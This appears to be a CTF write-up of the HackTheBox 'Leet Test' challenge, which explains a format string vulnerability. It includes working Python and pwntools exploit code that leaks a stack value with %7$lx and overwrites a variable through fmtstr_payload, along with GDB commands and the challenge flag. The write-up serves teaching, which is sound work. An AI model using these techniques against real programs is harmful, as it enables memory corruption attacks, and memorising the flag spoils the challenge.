Format String Vulnerability Explained

This post covers a binary with a format string vulnerability: the vulnerable code calls printf with user input as its format argument, without any filtering or validation. This lets an attacker submit format specifiers such as %x, %p or %n to leak values from the stack or even modify values in memory. The binary comes from the HackTheBox Leet Test challenge in the Intro to Binary Exploitation track.

Initial Analysis

I start by examining the provided binary file (leet_test) using checksec. I discover that there’s no stack canary and that Position Independent Executable (PIE) is disabled. This is good because the binary’s own code and data are loaded at fixed addresses, so the address of a variable inside the binary can be read straight from the disassembly instead of being leaked at runtime. However, NX (non-executable stack) is enabled, meaning I can’t directly execute code placed on the stack. That doesn’t matter for this challenge: the plan is to overwrite a single variable, so I won’t need shellcode or complex ROP (Return-Oriented Programming) chains.

Code Review with Ghidra

I then analyze the binary’s main function using Ghidra. I notice a line of code that reads a random value from /dev/urandom and stores it in a local variable (local_13c) after performing an AND operation with 0xFFFF, which limits it to 16 bits. The program then enters a while loop, prompting the user for their name using fgets. The input buffer (local_128) is 280 bytes and fgets reads at most 256 bytes, so there’s no buffer overflow at this stage. The vulnerability lies in the subsequent printf call, which passes local_128 itself as the format string, i.e. printf(local_128), rather than as an argument to a fixed format such as printf("%s", local_128). Because local_128 is user-controlled, this creates a format string vulnerability.

Understanding Format String Vulnerabilities

I briefly explain that a format string vulnerability occurs when user-supplied input is interpreted by a formatting function (in this case, printf) as format specifiers instead of plain data. Depending on the specifiers used, this can allow an attacker to read from the stack, write to memory, cause a crash, or ultimately execute code. The goal is to make printf treat our input as format specifiers.

Exploitation Strategy

The program has a condition to print the flag: if the randomly generated value multiplied by a constant equals “winner” (a variable that holds 0xCAFEBABE), the loop breaks and the flag is displayed. Since the random value is unpredictable, I need to leverage the format string vulnerability to control the value of “winner” so that the check passes. My plan is to:

Find the offset of the random value on the stack.
Use the format string vulnerability to write a desired value to the “winner” variable’s memory location.

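I explain that format specifiers like %x (print a value from the stack as hex), %s (print the string that a stack value points to), and %n (write the number of characters printed so far to the address that a stack value points to) will be crucial.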
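To make the role of %n more concrete, here is a minimal Python sketch of the arithmetic behind a byte-by-byte write with %hhn, the one-byte variant of %n. It is only a model under stated assumptions: the function names plan_hhn_writes and simulate are made up for this illustration, nothing here talks to the binary, and a real payload also has to place the target addresses on the stack and emit the padding with width specifiers.

```python
def plan_hhn_writes(value: int, size: int = 4, already_printed: int = 0):
    """Return (byte_index, padding) pairs for writing `value` one byte at a time.

    %hhn stores the low 8 bits of the number of characters printed so far,
    so before each write the output is padded until that count, modulo 256,
    equals the byte we want to store.
    """
    plan = []
    printed = already_printed
    for index in range(size):
        target = (value >> (8 * index)) & 0xFF  # little-endian byte order
        padding = (target - printed) % 256      # extra characters to print
        printed += padding
        plan.append((index, padding))
    return plan


def simulate(plan, already_printed: int = 0) -> int:
    """Replay a plan and rebuild the value the %hhn writes would store."""
    printed = already_printed
    value = 0
    for index, padding in plan:
        printed += padding
        value |= (printed & 0xFF) << (8 * index)
    return value


if __name__ == "__main__":
    plan = plan_hhn_writes(0xCAFEBABE)
    print(plan)
    print(hex(simulate(plan)))
```

The modulo is what keeps the payload short: each byte only needs the character count to wrap around to the right value, rather than printing billions of characters for a single four-byte %n write.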

Finding Offsets and Addresses

Input Control Offset: I experiment by inputting sequences of %x and observe the output to find where my input starts appearing on the stack. I determine that the offset where I can control the input is 10.
Winner Address: Using GDB, I disassemble the main function and identify the memory address of the “winner” variable.
Random Value Offset: I set a breakpoint in GDB just before the multiplication involving the random value. By examining the RAX register (which holds the random value before multiplication) and the stack pointer (RSP), I identify the random value on the stack. I then experiment with inputs like %6$lx and %7$lx to leak values from specific stack offsets. I find that %7$lx successfully leaks the random value.
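The probing described above can be sketched with a few small Python helpers. This is an illustration, not the script from the video: the helper names are hypothetical, the marker "AAAAAAAA" is an arbitrary choice, and the parsing assumes the program echoes the dot-separated values on a single line.

```python
def probe(offset: int, spec: str = "lx") -> bytes:
    """Build a direct-parameter-access probe such as b"%7$lx"."""
    if offset < 1:
        raise ValueError("positional arguments are numbered from 1")
    return f"%{offset}${spec}".encode()


def marker_probe(count: int, marker: bytes = b"AAAAAAAA") -> bytes:
    """Marker followed by `count` dot-separated %lx specifiers."""
    return marker + b"." + b".".join([b"%lx"] * count)


def find_marker_offset(output: bytes, marker: bytes = b"AAAAAAAA"):
    """Return the 1-based position at which the marker bytes are echoed back.

    The marker is read from the stack as a little-endian integer, so
    b"AAAAAAAA" shows up as 4141414141414141 in the %lx output.
    """
    needle = format(int.from_bytes(marker, "little"), "x").encode()
    fields = output.split(b".")[1:]  # drop the text before the first dot
    for position, field in enumerate(fields, start=1):
        if field.strip() == needle:
            return position
    return None


if __name__ == "__main__":
    print(marker_probe(12))  # paste into the name prompt
    print(probe(7))          # leak a single stack slot
```

Sending the output of marker_probe to the program and passing the reply to find_marker_offset gives the input control offset; probe then builds the single-slot leaks used to locate the random value.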

Crafting the Exploit with Pwntools

I use the pwntools library in Python to automate the exploit. The exploit script will:

Send %7$lx to leak the random value from the application.
Receive and decode this leaked random value.
Calculate the controller value. This is done by taking the leaked random value, multiplying it by the constant 0x1337c0de (from the binary’s logic), and then performing an AND operation with 0xffffffff to keep only the low 4 bytes (the 32-bit counterpart of the 0xFFFF mask in the binary). The result is exactly the value the program compares against “winner”, so writing it to “winner” makes the check pass.
Construct a payload using pwntools’ fmtstr_payload. This function takes:
- The input control offset (10).
- A dictionary mapping the address of “winner” to the calculated controller value. This tells pwntools to write the controller value to the “winner” address.
Send this payload to the application.
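The steps above could be put together roughly as follows. This is a sketch under several assumptions, not the author's script: it assumes the symbol winner is present in the binary's symbol table, that the first line received after sending the probe ends with the leaked hex value, and that nothing else is printed by the vulnerable printf before our input (so fmtstr_payload's default settings apply). The binary path is taken from the command line, and pwntools is imported inside run_exploit so the arithmetic helpers can be used without it.

```python
import sys

WINNER_MULTIPLIER = 0x1337C0DE  # constant from the binary's check
INPUT_OFFSET = 10               # offset where our input appears on the stack
RANDOM_OFFSET = 7               # offset that leaks the random value


def parse_leak(line: bytes) -> int:
    """Treat the last whitespace-separated token of a line as a hex number."""
    return int(line.split()[-1], 16)


def controller_value(random_value: int) -> int:
    """32-bit product that the program compares against `winner`."""
    return (random_value * WINNER_MULTIPLIER) & 0xFFFFFFFF


def run_exploit(path: str) -> bytes:
    # Imported lazily so the helpers above work without pwntools installed.
    from pwn import ELF, context, fmtstr_payload, process

    elf = context.binary = ELF(path)  # also sets the architecture for packing
    io = process(elf.path)

    # Step 1: leak the random value (assumes the reply line ends with it).
    io.sendline(f"%{RANDOM_OFFSET}$lx".encode())
    leak = parse_leak(io.recvline())

    # Step 2: overwrite `winner` with the value the check expects.
    winner_addr = elf.symbols["winner"]  # assumes the symbol is not stripped
    payload = fmtstr_payload(INPUT_OFFSET, {winner_addr: controller_value(leak)})
    io.sendline(payload)
    return io.recvall(timeout=2)


if __name__ == "__main__" and len(sys.argv) > 1:
    print(run_exploit(sys.argv[1]).decode(errors="replace"))
```

If the program prints a prompt or greeting on its own line, the receive logic needs adjusting (for example with recvuntil) before parse_leak is called.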

Success

By running the Python exploit script, I successfully overwrite the “winner” variable, bypass the conditional check, and retrieve the flag.

Technical Commands

Here are the commands typed into the terminal in the video, reconstructed from the narration:

ls
checksec leet_test
./leet_test
%x
%x.%x.%x...
%s
%s%s
%p (narrated as “PX”; possibly %x)
%x
%lx
%10$lx
gdb -q ./leet_test
disassemble main
b *main+221
run
x/i $rip
p/x $eax
x/20gx $rsp
%6$lx
%7$lx
clear
python3 exploit.py

Fully working exploit script can be found here

Flag

HTB{y0u_sur3_r_1337_en0ugh!!}

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
